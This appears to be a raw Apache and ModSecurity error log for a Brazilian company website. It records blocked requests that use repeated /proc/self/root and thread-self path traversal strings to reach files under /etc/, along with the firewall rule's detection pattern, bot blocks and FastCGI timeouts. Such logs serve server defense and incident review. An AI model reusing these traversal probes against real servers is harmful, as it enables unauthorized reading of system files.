[Wed Mar 18 00:41:28.642934 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:38522] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboe6OyqAr6etmhZHNpjnQAAAEw"]
[Wed Mar 18 00:41:45.917678 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:51652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboe-dY0UrI5A3LftIw8mgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:41:49.033834 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44932] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:41:54.121388 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:45698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofAta6ubjKNq_cu4ZCtgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:42:11.129816 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45306] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:42:33.125785 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45662] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:42:38.243569 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:33002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofLuw_le52K8_3pV2NcgAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:42:55.125815 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46074] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:43:01.127736 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:48454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofRdY0UrI5A3LftIw80AAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:43:17.057802 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:43:20.743642 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:48430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofWOyqAr6etmhZHNpkAwAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 00:43:24.634821 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:51888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofXCmAPhZkrhU8w4kdKgAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:43:39.121820 2026] [proxy_fcgi:error] [pid 29882:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:43:39.189277 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:48162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofa-yqAr6etmhZHNpkIgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:44:01.141820 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:44:04.503109 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.241.31:39456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofhEzinOy1jxa1j4e-3wAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:44:05.164222 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:36278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofhQkwaGbbGflqUZDBWwAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:44:23.126952 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47884] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:44:46.127816 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48318] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:45:00.862618 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.244.43:40428] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abofvOyqAr6etmhZHNpkMgAAAE0"]
[Wed Mar 18 00:45:08.125809 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48736] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:45:14.811897 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:52096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abofyuoXxyEfFpUF8f8amwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:45:23.947243 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.228.61:52614] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abof0ymAPhZkrhU8w4kdjwAAAIg"]
[Wed Mar 18 00:45:30.129811 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49204] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:45:53.073885 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49700] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:46:15.137818 2026] [proxy_fcgi:error] [pid 11816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:46:16.882137 2026] [core:alert] [pid 30077:tid 140411632822016] [client 216.73.216.191:51212] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 00:46:19.972324 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:16999] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogC9a6ubjKNq_cu4ZDNwAAA0Q"]
[Wed Mar 18 00:46:29.104057 2026] [core:alert] [pid 15826:tid 140411641214720] [client 74.7.241.31:34752] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 00:46:38.130189 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50576] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:46:40.710056 2026] [:error] [pid 17887:tid 140411624429312] [client 216.73.216.191:37097] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogIAkwaGbbGflqUZDBlAAAAM4"]
[Wed Mar 18 00:46:45.229325 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:46022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogI9a6ubjKNq_cu4ZDUgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 00:46:50.797949 2026] [:error] [pid 15051:tid 140411741927168] [client 216.73.216.191:12271] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogKimAPhZkrhU8w4kdrQAAAIA"]
[Wed Mar 18 00:47:00.123531 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51152] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:47:17.643556 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:42882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogRda6ubjKNq_cu4ZDaQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 00:47:22.129800 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51544] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:47:29.776106 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:53200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogUUzinOy1jxa1j4e_JwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:47:44.137787 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51984] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:48:06.117451 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:48:28.121229 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52920] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:48:31.336908 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:51000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogj0zinOy1jxa1j4e_YwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:48:51.125810 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53422] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:49:10.812144 2026] [mime_magic:error] [pid 30077:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:37574] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/systemd
[Wed Mar 18 00:49:17.125797 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53768] AH01075: Error dispatching request to : (polling)
